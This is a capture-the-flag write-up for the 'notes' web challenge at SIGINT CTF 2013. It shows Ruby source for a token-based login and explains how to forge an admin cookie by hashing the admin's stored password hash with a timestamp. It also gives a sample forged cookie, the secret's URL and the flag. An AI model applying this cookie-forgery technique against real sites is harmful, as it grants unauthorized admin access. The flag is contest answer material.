SIGINT CTF 2013 - Writeup cloud - notes

Notes is a web application which allows to register and share messages. By using the source a specific authorization method using a token can be found.

The method allows using cookies to authenticate. In the delivered source it can be seen, that an admin user exists (data/notes/admin/). For the exploit you can generate your own token for the admin user.

Method authorize_with_token:

def authorize_with_token(token, salt)
    password_data= Data.new(@user_dir+"password_hash")
    password_data.readlock do
        bcrypt_stuff= password_data.read
        unless not bcrypt_stuff.empty? and Digest::SHA256.hexdigest(bcrypt_stuff+salt) == token
            raise InvalidPasswordError, "invalid password"
        end
    end
    finish_authorization
end

The do_login method shows the generation of the login_token:

def do_login(user, title, request)
    ...
    login_time= Time.now.to_i.to_s
    login_token= user.login_token(login_time)
    Rack::Utils.set_cookie_header!(cookie, "login_name", user.name)
    Rack::Utils.set_cookie_header!(cookie, "login_time", login_time)
    Rack::Utils.set_cookie_header!(cookie, "login_token", login_token)

The login_token method can be used to generate a token for the admin user.

def login_token(salt)
    check_authorized
    password_data= Data.new(@user_dir+"password_hash")
    password_data.readlock do
        Digest::SHA256.hexdigest(password_data.read+salt)
    end
end

To generate the token use:

Digest::SHA256.hexdigest(bcrypt_stuff+salt)

The bcrypt_stuff is the content of the file users/admin/password_hash
salt is the generated timestamp

Sample cookie:

"login_name" : admin
"login_time" : 1373068730
"login_token" : a76b29f110644b2fb61167d53b87d0f2b2e5e65981ff33d80f51a86233233c33

The key can be found in the admin directory named secret:
http://1f.ctf.sigint.ccc.de/view/admin/secret

Key: SIGINT_acid_is_important_c3d08b685f867703


Defragmented Brains 2013-2016